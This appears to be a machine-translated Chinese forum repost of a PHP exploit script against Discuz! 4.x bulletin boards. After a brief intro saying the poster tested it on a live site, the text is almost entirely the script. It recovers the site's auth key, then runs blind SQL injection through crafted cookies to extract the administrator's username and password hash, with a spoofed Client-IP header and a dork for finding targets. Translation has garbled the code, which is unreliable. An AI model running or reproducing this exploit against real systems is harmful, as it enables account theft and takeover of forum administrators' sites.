discuz! 4.x SQL injection/admin Credentials Disclosure Exploit_ security related

I've been discuz! a while ago. 5.0.0 GBK version of exp
The 4.x I saw in Cn.tink today, I went to the original station and then I found a discuz! 4.1.0 test a bit, success, look at the screenshot below, discuz! 5.0.0 GBK version of that exp and many friends do not know how to use, at that time I said, or have friends do not understand, this time I cut the map up, do not know how to use a friend to see what should be understood.
Figure:

Copy Code code as follows:

<?php
Print_r ('
---------------------------------------------------------------------------
discuz! 4.x SQL injection/admin credentials disclosure exploit
by Rgod rgod@autistici.org
site:http://retrogod.altervista.org
Dork: "Powered by discuz!
---------------------------------------------------------------------------
');
if ($ARGC <3) {
Print_r ('
---------------------------------------------------------------------------
usage:php '. $argv [0]. ' Host path OPTIONS
Host:target Server (Ip/hostname)
Path:path to Discuz
Options:
-p[port]: Specify a port other than 80
-p[ip:port]: Specify a proxy
Example:
php '. $argv [0]. ' localhost/discuz/-p1.1.1.1:80
php '. $argv [0]. ' localhost/discuz/-p81
---------------------------------------------------------------------------
');
Die
}
error_reporting (0);
Ini_set ("Max_execution_time", 0);
Ini_set ("Default_socket_timeout", 5);

function Quick_dump ($string)
{
$result = '; $exa = '; $cont = 0;
For ($i =0 $i <=strlen ($string)-1; $i + +)
{
if ((Ord ($string [$i]) <= 32) | (Ord ($string [$i]) > 126))
{$result. = ".";}
Else
{$result. = "". $string [$i];}
if (strlen (Dechex (Ord ($string [$i])) ==2)
{$exa. = "". Dechex (Ord ($string [$i]));}
Else
{$exa. = "0". Dechex (Ord ($string [$i]);}
$cont ++;if ($cont ==15) {$cont =0; $result. = "\ r \ n"; $exa. = "\ r \ n";}
}
return $exa. " \ r \ n ". $result;
}
$proxy _regex = ' (\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';

function Sendpacketii ($packet)
{
Global $proxy, $host, $port, $html, $proxy _regex;
if ($proxy = = ") {
$ock =fsockopen (gethostbyname ($host), $port);
if (! $ock) {
Echo ' No response from '. $host. ': $port; Die
}
}
else {
$c = Preg_match ($proxy _regex, $proxy);
if (! $c) {
Echo ' Not a valid proxy ... ';d ie;
}
$parts =explode (': ', $proxy);
echo "Connecting to". $parts [0]. ":". $parts [1]. "Proxy...\r\n";
$ock =fsockopen ($parts [0], $parts [1]);
if (! $ock) {
Echo ' No response from proxy ... ';d ie;
}
}
Fputs ($ock, $packet);
if ($proxy = = ") {
$html = ';
while (!feof ($ock)) {
$html. =fgets ($ock);
}
}
else {
$html = ';
while (!feof ($ock)) or (!eregi (Chr (0x0d). chr (0x0a). chr (0x0d). Chr (0x0a), $html))) {
$html. =fread ($ock, 1);
}
}
Fclose ($ock);
}

$host = $argv [1];
$path = $ARGV [2];
$port = 80;
$proxy = "";
for ($i =3; $i < $ARGC; $i + +) {
$temp = $argv [$i][0]. $argv [$i][1];
if ($temp = = "-P")
{
$port =str_replace ("P", "", $argv [$i]);
}
if ($temp = = "-P")
{
$proxy =str_replace ("P", "", $argv [$i]);
}
}
if ($path [0]<> '/') or ($path [strlen ($path) -1]<> ')] {echo ' Error ... check the path! '; die;}
if ($proxy = =) {$p = $path;} else {$p = ' http://'. $host. ': $port. $path;}

echo "Please wait...\n";

From global.func.php
function Authcode ($string, $operation, $key = ') {
$key = $key? $key: $GLOBALS [' Discuz_auth_key '];
$coded = ';
$keylength = 32;
$string = $operation = = ' DECODE '? Base64_decode ($string): $string;
for ($i = 0; $i < strlen ($string); $i + + 32) {
$coded. = substr ($string, $i,) ^ $key;
}
$coded = $operation = = ' ENCODE '? Str_replace (' = ', ', Base64_encode ($coded)): $coded;
return $coded;
}

Stolen from install.php
function Random ($length) {
$hash = ';
$chars = ' abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz ';
$max = strlen ($chars)-1;
Mt_srand (Double) microtime () * 1000000);
for ($i = 0; $i < $length; $i + +) {
$hash. = $chars [Mt_rand (0, $max)];
}
return $hash;
}

$agent = "googlebot/2.1";
Errors sql ... you need auth key,
It's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask;)
$tt = "" For ($i =0 $i <=255; $i + +) {$tt. =CHR ($i);}
while (1)
{
$discuz _auth_key=random (32);
$packet = "Get". $p. " Admincp.php?action=recyclebin http/1.0\r\n ";
$packet. = "client-ip:999.999.999.999\r\n";//spoof
$packet. = "User-agent: $agent \ r \ n";
$packet. = "Host:". $host. " \ r \ n ";
$packet. = "cookie:adminid=1; cdb_sid=1; Cdb_auth= ". Authcode (" suntzu\tsuntzu\t ". $tt," ENCODE ")."; \ r\n ";
$packet. = "accept:text/plain\r\n";
$packet. = "connection:close\r\n\r\n";
$packet. = $data;
Sendpacketii ($packet);
$html =html_entity_decode ($html);
$html =str_replace ("<br/>", "", $html);
$t =explode ("and m.password= '", $html);
$t 2=explode ("'", $t [1]);
$pwd _f= $t 2[0];
$t =explode ("and m.secques= '", $html);
$t 2=explode ("' \ n", $t [1]);
$secques _f= $t 2[0];
$t =explode ("and m.uid= '", $html);
$t 2=explode ("' \x0d", $t [1]);
$uid _f= $t 2[0];
$my _string= $pwd _f. " \ t ". $secques _f." \ t ". $uid _f;
if ((strlen ($my _string) ==270) and (!eregi ("=", $my _string)) {
Break
}
}
$temp = Authcode ("suntzu\tsuntzu\t". $tt, "ENCODE");
Calculating key ...
$key = "";
For ($j =0 $j <32; $j + +) {
For ($i =0 $i <255; $i + +) {
$AA = "";
if ($j <>0) {
for ($k =1; $k <= $j; $k + +) {
$aa. = "a";
}
}
$GLOBALS [' Discuz_auth_key ']= $aa. chr ($i);
$t = Authcode ($temp, "DECODE");
if ($t [$j]== $my _string[$j]) {
$key. =CHR ($i);
}
}
}

echo "AUTH KEY->". $key. " \ r \ n ";
$GLOBALS [' Discuz_auth_key ']= $key;

echo "PWD hash (MD5)->";
$chars [0]=0;//null
$chars =array_merge ($chars, Range (48,57)); Numbers
$chars =array_merge ($chars, Range (97,102));//a-f Letters
$j =1; $password = "";
while (!strstr ($password, Chr (0)))
{
For ($i =0 $i <=255; $i + +)
{
if (In_array ($i, $chars))
{
can use every char because of base64_decode () ... so this bypass magic quotes ...
And some help by extract () to overwrite VARs
$sql = "999999"/**/union/**/select/**/1,1,1,1,1,1,1,1,1,1,1,1, (IF (ASCII (SUBSTRING (M.password, $j, 1) = ". $i."), 1,0 )), 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/cdb_sessions/**/s,/**/cdb_members/**/m/* */where/**/adminid=1/**/limit/**/1/* ";
$packet = "Get". $p. " admincp.php?action=recyclebin& http/1.0\r\n ";
$packet. = "User-agent: $agent \ r \ n";
$packet. = "client-ip:1.2.3.4\r\n";
$packet. = "Host:". $host. " \ r \ n ";
$packet. = "cookie:adminid=1; cdb_sid=1; Cdb_auth= ". Authcode (" suntzu\tsuntzu\t ". $sql," ENCODE ")."; \ r\n ";
$packet. = "accept:text/plain\r\n";
$packet. = "connection:close\r\n\r\n";
$packet. = $data;
Sendpacketii ($packet);
if (eregi ("Action=groupexpiry", $html)) {
$password. =CHR ($i), Echo chr ($i), sleep (1), break;
}
}
if ($i ==255) {
Die ("\nexploit failed ...");
}
}
$j + +;
}

echo "\nadmin user->";
$j =1; $admin = "";
while (!strstr ($admin, Chr (0)))
{
For ($i =0 $i <=255; $i + +)
{
$sql = "999999"/**/union/**/select/**/1,1,1,1,1,1,1,1,1,1,1,1, (IF (ASCII (SUBSTRING (M.username, $j, 1) = ". $i."), 1,0 )), 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/cdb_sessions/**/s,/**/cdb_members/**/m/* */where/**/adminid=1/**/limit/**/1/* ";
$packet = "Get". $p. " admincp.php?action=recyclebin& http/1.0\r\n ";
$packet. = "User-agent: $agent \ r \ n";
$packet. = "client-ip:1.2.3.4\r\n";
$packet. = "Host:". $host. " \ r \ n ";
$packet. = "cookie:adminid=1; cdb_sid=1; Cdb_auth= ". Authcode (" suntzu\tsuntzu\t ". $sql," ENCODE ")."; \ r\n ";
$packet. = "accept:text/plain\r\n";
$packet. = "connection:close\r\n\r\n";
$packet. = $data;
Sendpacketii ($packet);
if (eregi ("Action=groupexpiry", $html)) {
$admin. =CHR ($i), Echo chr ($i), sleep (1), break;
}
if ($i ==255) {die ("\nexploit failed ...");}
}
$j + +;
}

function Is_hash ($hash)
{
if (Ereg ("^[a-f0-9]{32}", Trim ($hash)) {return true;}
else {return false;}
}

if (Is_hash ($password)) {
echo "Exploit succeeded ...";
}
else {
echo "Exploit failed ...";
}
?>